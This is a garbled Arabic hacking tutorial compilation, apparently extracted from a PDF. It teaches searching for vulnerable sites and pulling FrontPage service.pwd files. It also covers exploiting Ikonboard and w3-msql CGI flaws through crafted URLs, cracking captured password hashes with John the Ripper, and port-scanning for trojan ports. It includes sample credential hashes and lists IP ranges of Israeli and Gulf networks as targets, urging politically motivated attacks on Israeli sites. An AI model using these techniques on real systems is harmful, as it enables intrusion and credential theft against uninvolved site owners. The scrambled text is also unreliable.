.‫والمزيد ‪.com‬‬ ‫تكتب في محرك البحث‬ ‫‪link:service.pwd‬‬ ‫أو‪.‬‬ ‫‪link:adminstrators‬‬ ‫وغيرها من الملفات الحتمال وجود ‪ password‬فيها‪.com‬‬ ‫واكتبوا في إطار البحث‬ ‫‪/_vti_pvt‬‬ ‫وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة‬ ‫وعندك محرك بحث‬ ‫‪/http://www.‬‬ ‫انتهى‪،،،‬‬ ‫‪171‬‬ .‬‬ ‫ويمكنك عمل الطريقة من ‪ DOS‬ولكن البرامج أسهل لك وأضمن لك‬ ‫======================================‬ ‫وألحين أكيد تبون تجربون على موقع أقولكم روحوا ‪google‬‬ ‫‪/http://www.altavista...google.

121 sites‬و ‪ ..vs?dw=1‬‬ ‫‪/http://www.sites 54‬تنتهي بـ ‪ net.htm‬‬ ‫وفيه كمان محركات بحث‬ ‫‪/http://www.cgi‬‬ ‫أكتب بعد الملف غير العنوان ليصبح ?‪http://www.il‬‬ ‫‪/http://www.edu .co.walla..7‬وهذا ليس لب موضوعي ولكن هي بدايه ومثال ل تحفظه لني أحضرت أبسط مثال فقط فيوجد غيره‬ ‫مئات بل آلف ملفات الـ ‪ CGIScript‬تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خلل ‪url‬‬ ‫للحصول على مثل هذه الستثمارات لثغرات ملفات السي جي آي سكريبت شوف الرشيف هذا وهو لغته‬ ‫روسيه أعتقد ولكن ما يهم لننا نبحث عن الـ ‪ Exploit‬أو الستثمار‬ ‫‪/http://www./members/[member]..4 sites‬لعينه ‪israel..reshet.il‬و ‪ sites 2009‬تنتهي بـ ‪ ، com‬و‬ ‫‪ .cgi ، link:help.‫" الختراق العشوائي "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةةة<‬ ‫ ماهو الـإختراق العشوائي ‪Random Hacking‬‬‫ تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬‫ كيف تستغل اي ثغره بعد الحصول عليها‬‫ ماهو الـإختراق العشوائي ‪Random Hacking‬‬‫هو البحث في كميه كبيره من المواقع عن ثغره محدده ‪ ،‬وهذا سهل ويعود بمواقع كثيره جدا جاهزه للختراق‬ ‫‪ ،‬مثال بسيط جدا ‪ ،‬روح على محرك بحث ‪ ،‬من محركات البحث التي تعتمد على الـ ‪ spiders‬أو العناكب‬ ‫مثل ‪ altavista.sites 29‬تنتهي بـ ‪ muni.84 ،‬‬ ‫‪ .il‬‬ ‫‪/http://www..sites‬و ‪.com/eng_ver/bugs‬‬ ‫وممكن تأخذ إسم المنتج مثل وتضعه في محرك البحث لـ ‪ /http://www..sites 78‬تنتهي بـ ‪ gov..securiteam.il‬و ‪ .com‬وأكتب ‪) ، link:xxxx.sites 137‬تنتهي بـ ‪ net‬و ‪ .co.com‬وتشوف‬ ‫النتائج ‪ ،‬أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا‬ ‫أعجبت بها وهي مختصه في المن وليس لـثغرات السي جي آي سكربت ‪ ،‬يعني امن واخبار وكل شئ ‪.il .secure.1.example.il‬و ‪1104‬‬ ‫‪ sites‬تنتهي بـ ‪ org..il/sites/sites..com/cgi-bin/help...il‬و ‪ sites 70‬تنتهي بـ ‪ ac.‬‬ ‫ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ‪ ،‬هو برنامج لتسهيل عمليه الحصول‬ ‫على الخبار ووو‪.example.il‬‬ ‫‪172‬‬ .cgi‬لتعرف اين مكانه ‪ ،‬لنفرض مكانه هنا ‪http://www.il‬وهذه مهمه ‪ ،‬و‬ ‫‪ .net .il/data/index.com/cgi-‬‬ ‫‪bin/help.il‬‬ ‫‪http://www.cgi‬‬ ‫‪helpon=.cgi%00‬‬ ‫مع ملحظه تغيير ]‪ [member‬بإسم عضو وبدون القوسين ][ طبعا‬ ‫سوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى ‪Ikonboard‬‬ ‫‪ 2.tapuz..cgi or pl‬إرجع لشرح زورو في رياضيات البحث( مثل‬ ‫نبحث عن لنك لملف بإسم ‪ help.co.‬الخ‬ ‫ تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬‫الختراق العشوائي إذا كان فعل عشوائي ‪ ،‬يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ‪ ،‬لكن‬ ‫ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ‪ ،‬أنا اقول لك كيف ‪ ،‬مثل إسرائيل اللي الكل يكرهها ‪،‬‬ ‫الذين يأمرون الفلسطينيين بأوقاف إطلق النار ‪ ، (:‬الكل يكرههم ليس لجل أنهم يهود ‪ ،‬ل نكرههم لنهم‬ ‫ظلموا فلسطين ‪ ،‬عندهم موقع فيه آلف من مواقعهم هذا هو ‪ sites 12610‬تنتهي بـ ‪ co.achla.maven.cgi‬المواقع المردوده لك نتيجه للبحث كلها تملك‬ ‫منتدى ‪ ، Ikonboard‬إفتح واحد منها وأبحث في المصدر الكود ‪ HTML‬عن السكربت الذي بحثت عنه‬ ‫‪ help.co. .il‬و ‪ ..co.org .sites‬عشان تحصل على كل هذه السايت روح الموقع هذا‬ ‫‪http://iguide.f2s.co.

.pl‬إذا كان الـ ‪ exploit‬بلغه‬ ‫بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ‪ ،‬وهذه الشياء تكون مكتوبه بين علمات التعليقات ‪(:‬‬ ‫وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ‪ ،‬في هذه الناحيه ل تطلب شرح بالصور ‪ (:‬إذا رجع لك رد‬ ‫طويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق علمة > وثم مسافه وإسم الملف مثل ‪perl‬‬ ‫‪exploit.‬الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود ‪.sa :8080‬وثم يرسل له أمر ‪ ، GET‬مثل ترسل للبروكسي‬ ‫‪GET http://www.il/find. not found..‬‬ ‫انتهى‪،،،‬‬ ‫‪173‬‬ .net..0‬‬ ‫‪*/* .‫‪http://www.‬الخ ‪ ،‬من هذه الردود تعرف اللي نت فاوند وال موجود ولكن‬ ‫غير مسموح بالوصول له ‪..‬‬ ‫وافتحه وتجد كل المواقع ‪ ،‬اللي كتب عنها ‪ The page cannot be displayed.Accept: image/gif.info.co.0 (compatible.2‬فيه مفسر بيرل ممتاز جدا افضل‬ ‫من أكتيف بيرل بعشرات المرات‪.html‬‬ ‫طريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا ‪ Random Hacking‬يعني إختراق عشوائي ‪،‬‬ ‫ولكن لو فعل بحثت عن ‪ w3-msql‬في المواقع السرائليه فأنا أقول لك بأنك ما راح تلقى كثير أو لن تجد‬ ‫شئ ‪ ،‬ممكن تبحث عن ‪ /vti_pvt_/‬لترصد كل المواقع التي فيها فرونت بيج ‪ ،‬وطبعا بعد ما يتم حفظ كل‬ ‫المعلومات المسترجعه من البروكسي تكون بشكل ‪ HTML‬عشان كذا أنت خل الملف يكون بنسق *‪html.pl‬‬ ‫وفيه محرك أعدم منها واللي هو ‪altavista.il‬‬ ‫المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ‪ ،‬يستخدم اللغه التي يتقنها‬ ‫ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها‬ ‫العمليه الثانيه هي البحث فيها كلها عن منتج ‪ ،‬مثل ‪ ، /w3-msql‬الطريقه سهله جدا ‪ ،‬أول يتم الشبك مع‬ ‫بروكسي مثل ‪ proxy... image/jpeg.pl > log. MSIE 5.‬والباقي عليك‬ ‫ كيف تستغل اي ثغره بعد الحصول عليها‬‫إذا كانت ‪ url‬ما يبغا لها فلسفه ‪ ،‬كود ‪ c‬وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجون‬ ‫ثاني لـه ولكن بلغه ‪ perl‬أو ‪ Shell *.sh‬وهو الذي يقابل ‪ Batch‬في ويندوز وتحدثنا عنها في كوكب‬ ‫لغات البرمجه ‪ ،‬من الدوس بعد ما تثبت أكتيف بيرل أكتب ‪ perl exploit.htm‬‬ ‫وبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ‪ ،‬لن بعض الـ ‪ Exploit‬كتب في الصدار أربعه وممكن‬ ‫خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله‬ ‫يطلب خبره في اللغه ‪ ،‬وعلى فكره ليونكس )أعمل على ‪( RedHat 6. image/pjpeg‬‬ ‫‪Accept-Language: ar-sa‬‬ ‫‪(User-Agent: Mozilla/4...com..il/cgi-bin‬يتضح طلبنا لـ ‪cgi-‬‬ ‫‪ ، /bin/w3-msql‬في الحقيقه ل نبحث عن ثغرات سي جي آي ‪ ،‬ولكن نبحث عن كل المواقع التي يوجد‬ ‫بها المنتج ‪ ، WWWMSQL‬يعني المواقع السرائليه مثل التي جمعناها في ملف تكست كلها تأخذ واحد‬ ‫واحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن ‪ cgi-bin/w3-msql‬وثم يحفظ‬ ‫رد البروكسي في ملف خارجي ‪ ،‬وهكذا حتى ننتهي من كل المواقع ‪ ،‬وثم نفتح الملف ونشوف التي تم إيجاد‬ ‫المنتج ‪ WWWMSQL‬داخها والتي لم يوجد ‪ ،‬ونتوجه الى سيكيورتي فوكس وال سيكيورتي تيم وال أي‬ ‫موقع يعجبك وابحث عن ‪ ، w3-msql‬مثل في سيكوتي تيم نجد ‪ Exploit‬لـ ‪ w3-msql‬يمكن تطبيقه‬ ‫من المتصفح ‪ ،‬وهو هنا ‪http://www.securiteam..isp.‬واللي‬ ‫‪ Forbddien‬واللي ‪.com.gov.com..il/cgi-bin/w3-msql/ HTTP/1.5. image/x-xbitmap. Windows 98‬‬ ‫‪Host: www..com/exploits/2WUQBRFS3A.il‬‬ ‫‪Proxy-Connection: Keep-Alive‬‬ ‫وهو يطلب من البروكسي أحضار الموقع ‪ ، /http://www.

‫" الطريقة الصحيحة والمثلى في اختراق المواقع "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪< marwan911 :‬‬ ‫اول خطوة في الختراق واللي هي اخذ المعلومات‬ ‫يعني نعرف الموقع الفلني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها‪.org‬‬ ‫ملحظة‪ :‬نكتبه من غير ‪ //:http‬ول ‪ /‬اللي بالخير‬ ‫‪http://uptime.com/up/graph.netcraft.whitehouse.org is running Microsoft-IIS/5....netcraft.0 on Windows‬‬ ‫‪2000‬‬ ‫طيب‬ ‫الحين عرفنا معلومتين مهمتين‬ ‫اول شيء انه شغال على الملقم ‪IIS5.‬‬ ‫طيب‬ ‫الحين عندنا موقع‬ ‫وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها‬ ‫عندك الموقع ‪http://www.0‬‬ ‫ثاني شيء شغال على نظام ويندوز ‪2000‬‬ ‫حلو‬ ‫‪174‬‬ .‬‬ ‫الملقمات اشهرها اثنين‬ ‫‪ :IIS‬من مايكروسوفت وهذه مليانة ثغرات‪) .whitehouse.net‬‬ ‫ادخله‬ ‫تلقي مربع‬ ‫هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق‬ ‫مثل نحط موقع البيت البيض اللي هو ‪whitehouse.org‬‬ ‫راح يطلع لنا التالي‬ ‫‪The site www.‬ومواقع قليل مقفلة ثغراتها(‬ ‫‪ :apache‬من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب‪.

‬‬ ‫طيب لنفرض انه ماطلع فيها ثغرات؟‬ ‫نشوف محتويات الموقع نفسه‬ ‫نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي‬ ‫بعد الموضوع‪.3.com‬‬ ‫لو حللناه بالنيت كرافت راح نشوف النتيجة التالية‬ ‫)‪The site www.arank.20‬و دعم فرونت بيج ‪ FrontPage/5.26 mod_bwlimited/0.19.0‬عليه )راح احطها بعد الموضوع(‬ ‫إذا مانفع شيء نشوف ثغرات نظام ويندوز ‪) 2000‬راح احط الموقع بعد الموضوع(‬ ‫طيب‬ ‫الحين فيه حاجة اسمها يوني كود‬ ‫هذه تخترق فيها عن طريق المتصفح‬ ‫وماتمشي إل مع ملقمات ‪ IIS‬وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع‪ .3.3 FrontPage/5.arank.8.‫اول شيء نجرب ثغرات ‪ IIS5.‬‬ ‫نشوف دعم الفرونت بيج‬ ‫زي ماقلنا الفرونت بيج مليان ثغرات‬ ‫وثغراته قوية وكثيرة تقريبا‬ ‫منها مجلد _‪ vti_pvt‬و _‪ private‬هذه اللي نحتاجها غيره مامنه فايدة‬ ‫‪175‬‬ .8 PHP/4.0.com is running Apache/1.9.2.‬راح احط امثلة‬ ‫عليها‪.1a mod_perl/1.6‬‬ ‫‪on Linux‬‬ ‫طيب هنا يهمنا ثلث اشياء‬ ‫الملقم وهو ‪ apache 1.‬‬ ‫طيب لو كان السيرفر اباتشي؟‬ ‫خلونا ناخذ مثال موقع ارانك ‪www.2510 mod_ssl/2.2.0.4 OpenSSL/0.6‬‬ ‫‪mod_log_bytes/0.3.20 (Unix‬‬ ‫‪mod_gzip/1.0.2510‬وهذه مليانة ثغرات‬ ‫والثالث النظام وهو ‪Linux‬‬ ‫طيب‬ ‫الملقم‬ ‫اول شيء اباتشي من الملقمات الصعبة الختراق إل بعض الصدارات منها فنحط هذه على جنب‪.

sa/_vti_pvt/service.FILE‬‬ ‫وعاد استناه يطلع لك الباسس‬ ‫طيب نروح للفقرة الثالثة واللي هي النظام‬ ‫زي ماشفنا النظام هو لينكس‬ ‫لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر‬ ‫لكن هنا راح تواجهك مشكلتين‬ ‫اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول ‪ telnet‬واكتب عنوان الموقع يطلع لك النظام فوق‬ ‫نوعه وإصدارته‬ ‫المشكلة الثانية لزم يكون عندك لينكس اصل‬ ‫علشان ثغراته بلغة ال ‪ c‬وهذه ماتشتغل إل عاللينكس فقط‬ ‫================‬ ‫‪ /http://neworder.sk‬هذا الموقع مفيد جدا تكتب مثل )فوق بالمربع اللي عاليمين( ‪ IIS‬او‬ ‫‪ apache‬او منتدى واصدارته او اي برنامج ويطلع لك ثغراته‬ ‫‪ /http://www.pwd‬ويعتبر هذا اخطر ملف‬ ‫طيب لو قدرنا ننزل واحد من الملفات هذه )ملحظة الثغرة هذه موجودة ب ‪ %70‬من المواقع الموجودة‬ ‫عالنت( لو نزلناها نفتحها بالمفكرة ونلقي السطر هذا على سبيل المثال‬ ‫‪goodyco:CalXS8USl4TGM‬‬ ‫وهذا من موقع قودي ‪http://www..‫داخل المجلدين راح نلقي اربع ملفات مهمة وهي ‪ service.‬ومنوعة من ‪ c‬و ‪ perl‬و‬ ‫يوني كود‪.pwd‬و ‪authors.‬‬ ‫انتهى‪،،،‬‬ ‫‪176‬‬ .pwd‬‬ ‫طيب الحين ‪ goodyco‬اليوزر والباسس مشفر واللي هو ‪CalXS8USl4TGM‬‬ ‫وشلون ينفك؟ ينفك ببرنامج اسمه ‪john the repaier‬‬ ‫تنزله وتحط الملف المشفر )مع اليوزر( بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي‬ ‫‪john -i PASSWORD.pwd‬و ‪ users.com‬الموقع هذا خطير جدًا جداً تروح ل ‪ EXPLOITS‬اللي عاليسار‬ ‫وتختار اول اختيار هنا ثغرات جميع النظمة من لينكس و ويندوز و و و الخ‪ .pwd‬‬ ‫و ‪ adminstators.com.ussrback.goody.box.

‬عليك بأتجاه للموقع المراد اختراقه‬ ‫حيث يجب عليك دراسة الموقع كامل من حيث عدة عوامل اهمها‬ ‫‪ ( -1‬نظام السيرفر والمستخدم في الموقع وينقسم السيرفر الى نوعين‬ ‫ا ( ‪ -‬النوع الول هو ‪ ) IIS‬اي اي اس (‬ ‫ب ( ‪ -‬النوع الثاني ‪ ) apachc‬اباشي (‬ ‫‪ ( -2‬ملحظة وجود محرك بحث في الموقع ام ل‬ ‫‪ ( -3‬معرفة وقت الذروه لزوار الموقع ووقت الخمول‬ ‫‪ ( -4‬معرفة اليبي للموقع‬ ‫تقريبا هذه اهم العوامل المتخذه كعوامل مطلوبه جدا لتنفيذ العمليه وهذه تاخذ‬ ‫وقت حيث ان كل شي مايجي بالساهل‬ ‫سبق وذكرنا السيرفر ‪ IIS‬والداعم لبعض المواقع وهذا امره تقريبا سهل حيث ان‬ ‫اغلب من يستعمل هذه الطريقه هم من الهواه‬ ‫حيث ان ثغرات تقريبا سهله واختراقها ايضا مرتبط بأن تكون الثغرات التي لديك‬ ‫جديده و طااازه‬ ‫وشوية صبر بالستعانه بال ثم ببعض البرامج المساعده وسوف تححق نجاحاتك‬ ‫بأذن ال ‪.‫" نبذه يسيرة ومبسطة عن كيفية اختراق المواقع "‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةة<‬ ‫>ةةةةةة‪:‬‬ ‫ركز معي‬ ‫هذا سؤال يحير الجميع بالذات المبتدئين ‪ .‬‬ ‫سيرفر ‪ apachc‬وهذا السيرفر قوي جدا وغالبا ل يعمل على البحث عن ثغراته‬ ‫سوى المحترفون ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫‪177‬‬ .‬لنه يتطلب عدة امور ل يستطيع عملها ال من له خبره‬ ‫بنظام ليونكس ويعرف بعض لغات البرمجه ‪.

com :‬وقم بنسخه والصقه في مجلد ‪ .pwd :‬‬ ‫وبعد فتح الملف ‪ service.pwd‬هتلقي مكتوب بداخله هكذا تقريبا‪:‬‬ ‫‪-FrontPage. FrontPage‬وبتمكنك من معرفة كلمة سر الدمين تبع الموقع ‪(:‬‬ ‫وكلمات السر هذه بتكون موجودة في الملفات التالية‪:‬‬ ‫‪Administrator. WS_FTP‬أو ضع بدل ‪ www‬في عنوان الموقع كلمة‬ ‫‪ ftp‬مثل هذا‪ ftp.ebnmasr.‬أنا تطوت كثير ‪(:‬‬ ‫ج*‪ :‬أوكى تفضل ‪(:‬‬ ‫س ‪ :2‬لقد سمعت كثيرا عن ثغرات الفرونت بيج ‪ .pwd‬‬ ‫‪Users.pwd‬‬ ‫التي بتكون عادة في المجلد _‪vti_pvt‬‬ ‫مثل هذه الملف مثل‪(: http://www. run‬أوكى ؟؟‬ ‫‪178‬‬ .‬ولعب العيال هذا !!‬ ‫س*‪ :‬ل ل ‪ .openwall.‬وسيطلب منك الموقع اسم‬ ‫المستخدم وكلمة المرور للموقع ‪(:‬‬ ‫س ‪ :4‬مشكور حبيبي ولكن ليش مايدخل باسم المستخدم وكلمة السر هذه ‪:‬‬ ‫‪ tradesys:FpNTpIDWSk872‬؟؟ )‪(N‬‬ ‫ج ‪ :4‬بكل بساطه لنها مشفرة !! ‪ .‬يمكنك فك تشفيرها عن طريق برنامج مثل برنامج ‪John The‬‬ ‫‪ .pwd‬‬ ‫‪Administrators.‬هل يمكنك توضيح طريقة استخدام هذه الثغرة ‪. Ripper‬نزله من هنا‪http://www.tradesystemlab.‬أنا كنت عايز أسألك شوية أسألة في الهاكنج‪.‬أنا في الخدمة ‪ .com/_vti_pvt/service.com :‬وقم بموضعه في شريط العنوان ‪ .‬لكني ماأعرف أستخدم هذا البرنامج ‪ .‬بس ياريت ماتكون عن اختراق الجهزة ‪ .com/john :‬‬ ‫س ‪ :5‬أها ‪ . run‬شوف‪ :‬عشان تسهل على نفسك وبدل ماتفتح الدوس‬ ‫وتدخل على مجلد البرنامج وهالمشاكل وكمان البعض ما بيعرف يعمل هالشياء ‪: p:‬‬ ‫ابحث في جهازك عن‪ command.‬ممكن تشرحهولي أخي العزيز القناص لو سمحت ؟؟‬ ‫ج ‪ :5‬لتستأذن مني ياولد !! ‪ .‬‬ ‫ج*‪ :‬تفضل حبيبي ‪ . (:‬شوف‪ :‬انت أول ماتنزل البرنامج وتفك ضغطه ‪ .‬هيكون فيه‬ ‫مجلدين‪ . doc & run :‬الي يهمنا هو مجلد ‪ .‬ولكن كيف أدخل على الموقع كأدمين بهذه الكلمات ؟؟ ‪S:‬‬ ‫ج‪ :‬يمكنك استخدام برنامج اف تي بي مثل برنامج ‪ .‬‬ ‫ج ‪ :2‬بالتأكيد حبي ومن عيوني الثنين ‪D:‬‬ ‫طبعا ثغرات الفرونت بيج بتكون موجودة في أنظمة التشغيل ‪ NT & Unix‬التي يدعم سيرفراتها الـ‬ ‫‪ .#‬‬ ‫‪tradesys:FpNTpIDWSk872‬‬ ‫وهذه كلمة السر المشفرة واسم المستخدم ‪(:‬‬ ‫س ‪ :3‬أووووه واااااو ممتاز ‪ .pwd‬‬ ‫‪Authors.‫" )>س&ج<( في اختراق المواقع للمبتدئين "‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة ةةةةةة<‬ ‫س*‪ :‬السلم عليكم أخي القناص العربي‪(:‬‬ ‫ج*‪ :‬أهلين القناص العربي المزيف ‪D:‬‬ ‫س*‪ :‬أحم أحم ‪ .

‬مشكور حبيبي ‪ .txt‬ليبحث لك عن الكلمات السرية التي تكون مطابقه لسم المستخدم‬ ‫‪ << john -i:Digits passwd.( ‪ .‬‬ ‫س ‪ :10‬ممممم ‪ .txt‬ليبحث لك عن الرقام فقط‬ ‫‪ << john -i:Alpha passwd.com :‬‬ ‫انتهى‪،،،‬‬ ‫‪179‬‬ .‬كنت عايز أسألك كمان عن كيفية عمل برامج السكان على الثغرات ‪(:‬‬ ‫ج ‪ :11‬البرامج هذه بتكون فيها مجموعة كبيرة من الثغرات أو الـ ‪ . $:‬يعني انت مثل عايز تبحث عن‬ ‫الثغرة التي تم ذكرها سابقا ‪ .‬حتى لو أخذ أسبوع .‬لكن لن أقولك لك على أي واحدة‬ ‫منها ‪ .( ‪ . (Y‬لكن وين اسم المستخدم ؟؟‬ ‫ج ‪ :7‬في كلمة السر هذه‪ . EXPLOITES‬وبتبدأ تجرب ثغرة‬ ‫ثغرة على الموقع ‪ .‬مانت كاتب غير كلمة واحدة ‪ .‬هذه‪(: (: (: service.. /http://www.‬ولكن انت لو كان‬ ‫عنك موقع ممكن تعمل عليه سكان ببرنامج فحص مثل برنامج عمران ) المفضل لدي ‪ ( D:‬عشان تطلع‬ ‫الثغرات الموجودة بالموقع ‪(:‬‬ ‫س ‪ :9‬طيب أنا عندي سؤالين عالجواب الي فات ده ‪ .‬كيف يعني تبحث عن ثغرة معينه ؟؟ ‪ .‬وأنا على طول أستخدم هذا المر ‪. (:‬وفي موقع رهيييب عشان تجيب منه الـ ‪ .‬هتكتب ايه ؟؟ ‪ . (:‬ايه طريقة البحث العشوائي هذه‬ ‫؟؟‬ ‫ج‪ :‬أحم أحم ‪ .txt‬ليبحث لك عن الحروف الصغيرة‬ ‫‪ << john -i:all passwd.( ‪.‬‬ ‫عشان كده بتطول عملية الفك معي ‪( D:‬‬ ‫وبعدما ينتهي البرنامج من فك الكلمة ستجد كلمة السر المشفرة والمفكوكه بالملف هذا‪john.co.‬‬ ‫وممكن تعرف حالة البرنامج بالضغط على أي زر من لوحة المفاتيح ‪(:‬‬ ‫س ‪ :7‬الحمد ل ‪ .pwd :‬‬ ‫س ‪ :11‬أهاااااا ‪ .‬عشان معظم النتائج تكون مواقع‬ ‫اسرائيلية .‬لنه بيجرب جميع الحتمالت‪.pot :‬‬ ‫س ‪ :6‬يااااااه ‪ .‬أنا بصراحة جبتها بالبحث العشوائي ‪ .‬وليه هالوجه الخجلن . john.‬وتطلعلك النتائج ‪ .‬في طبعا مواقع كثيرة بتستخدم السبايدرز ‪ . EXPLOITES‬هذا‬ ‫هو‪.exe‬افتح ‪ command.‫وجيب كلمة السر هذه‪ tradesys:FpNTpIDWSk872 :‬وحطها في ملف ‪ txt‬باسم ‪ passwd‬مثل‬ ‫وضعه في مجلد ‪ .‬هأسأل واحد الول ‪ .‬هذه الطريقة ‪ :‬انك تبحث عن ثغرة معينة في محرك بحث يستخدم الـ ‪ spiders‬عشان تلقي‬ ‫مواقع كثيييرة فيها الثغرة هذه ‪ .‬ال هذا الموقع‪ walla. run‬ول تقم بفتح ‪ .il :‬وطبعا هذا موقع اسرائيلي ‪ .txt‬ليبحث لك عن جميع الحتمالت ‪ ) . tradesys:FpNTpIDWSk872 :‬هيكون اسم المستخدم‪tradesys :‬‬ ‫) يعني الكلمة الي بتكون قبل علمة ‪( :‬‬ ‫س ‪ :8‬قنااااااص ‪ .com‬واكتب فيه الوامر التالية‪:‬‬ ‫‪ << john -single passwd.‬خلص انفكت كلمة السر )‪ .ussrback.‬مافهمتك زين !!‬ ‫ج ‪ :10‬أنا وال ماأستخدم هالمواقع ال للبحث عن ثغرات الفرونت بيج ‪ .‬ممكن تقولي كيف جبت هالثغرة من الموقع ؟؟ ‪$:‬‬ ‫ج ‪ :8‬هههههههههه ‪ ..‬متأكد أنه هيفك تشفيرها ؟؟‬ ‫ج ‪ :6‬أيوووووه لزم يفك تشفيرها في النهاية ‪ .‬البرنامج طول كثير ‪ .

.‬‬ ‫رقم ‪ 3‬بدأ البحث‪.zip‬‬ ‫انتهى‪،،،‬‬ ‫‪180‬‬ .‬‬ ‫‪http://mypage.‬‬ ‫رقم ‪ 2‬أظهار الكودات المستخدمة‪.ayna.‬‬ ‫رقم ‪ 4‬تضع العنوان للضحية‪.‬‬ ‫وصلة البرنامج‪.‫" برنامج ‪ CgiScaner‬للبحث عن الثغرات "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪ :‬ةة ةةةة<‬ ‫هنا برنامج رائع للبحث عن الثغرات‬ ‫رقم ‪ 1‬خروج‪.‬‬ ‫وأترك البرنامج وسوف يظهر لك الثغرات الموجودة فى الموقع‪.com/vox99/cgiscan3.

.‬رغم ان‬ ‫البرنامج وقوة اتصاله ممتازه ال ان الباحث ضعيف فنستخدم هذا البرنامج كاداة‬ ‫مساعده ’’’’’ ول اطيل عليكم بالكلم اليكم الشرح‬ ‫انا شرحت البرنامج رغم سهولته وفوق ذلك معرب‬ ‫ولكن البعض ليعرف استخدامه ‪ ..‫" شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في‬ ‫المواقع "‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫تعريف بالبرنامج ‪ :::‬هذا البرنامج يقوم بالبحث عن المنافذ المفتوحه في جهاز‬ ‫الضحيه ‪ .‬لن بعض البرامج يكون فيها الباحث ضعيف ول يصيد‬ ‫اي اي بي به منفذ مفتوح ومن امثلة ذلك برنامج السب سفن جولد ‪ ...‬اليكم واجهة البرنامج‬ ‫‪181‬‬ ..

....‫ثلث خطوات تقوم بها وهي كالتالي ‪::‬‬ ‫انظر اعلى اليمين تجد قائمة المنافذ ادخل قائمة المنافذ لتحديد المنفذ‬ ‫ل السب سفن المنفذ الخاص به ‪ 27374‬او ‪.‬انتهى و‪... 1243‬‬ ‫المراد البحث فيه مث ً‬ ‫انظر الصوره التاليه ؟‬ ‫في رقم واحد نكتب المنفذ الذي نريد البحث فيه‬ ‫رقم اثنين لكي نضيف المنفذ **ملحظه نقدر نضيف اكثر من منفذ‬ ‫بعد ماننتهي من اضافة المنفذ نضغط اوكي للتأكيد ونتأكد من ان المنفذ قد‬ ‫اضفناه كما في الصوره ‪.‬‬ ‫بعد ذلك نرجع للصوره الولى ونضبط الخيارات كما هو موضح‬ ‫ونحدد الي بي من ‪ ------------‬الى‬ ‫بعد ذلك نضغط ابــــــــــــدأ فتظهر لنا الي بيات والي بي الذي به منفذ مفتوح‬ ‫نحصل علمة ‪ +‬على يساره عندما نضغط عليه يظهر لنا المنفذ المفتوح‬ ‫كما في الصوره الولى ‪..‬‬ ‫‪182‬‬ ....

255<------------212.255---------------212.229.43.255---------------209.‬‬ ‫‪http://mypage.88.255.25.208.1‬عمان‬ ‫‪ <-------------212.187.229.42.49.133.255----------------213.255---------------212.133.255.92.255<-------------195.224.70.72.204.255<-----------195.1‬أسرائيل‬ ‫‪<--------212.130.1‬أسرائيل‬ ‫‪<---------213.26..13.128.1‬السعوديه‬ ‫‪ <-----------213.229.198.1‬المارات‬ ‫‪ <-------------208.229.1‬المارات‬ ‫‪ <----------195.255<-------------168.139.236.188.150.50.92.255<--------------208.6.1‬أسرائيل‬ ‫‪<--------209.255<------------206.1.7.1‬أسرائيل‬ ‫‪<-------212.82.2.255---------------199.224.39.1.226.102.1‬المارات‬ ‫‪<-----------194.128.117.255<------------194.1‬السعوديه‬ ‫‪ <-----------195.255<------------195.1‬أسرائيل‬ ‫‪<--------139.139.1‬قطر‬ ‫‪ <------------209.203.1‬أسرائيل‬ ‫‪<-------193.106.31.70.255--------------192.1‬السعوديه‬ ‫‪ <-----------212.255<------------193.143.1.1.114.102.255--------------193.255---------------139.102.43.255---------------192.8.ayna.133.40.30..113.145.72.49.75.225<--------------212.226.60.208.143.1‬الكويت‬ ‫‪<-----------195.255.238.‫وصلة البرنامج‪.20.133.1‬أسرائيل‬ ‫‪<--------192.39.238.0.180.42.1‬السعوديه‬ ‫‪ <------------212.238.42.26.1‬الكويت‬ ‫‪<----------195.150.30.25.240.1‬أسرائيل‬ ‫‪<---------216.255----------------128.1‬أسرائيل‬ ‫‪<--------199.170.150.1‬الكويت‬ ‫‪ <-----------194.1‬الكويت‬ ‫‪<----------168.204.255<-------------213.32.1‬أسرائيل‬ 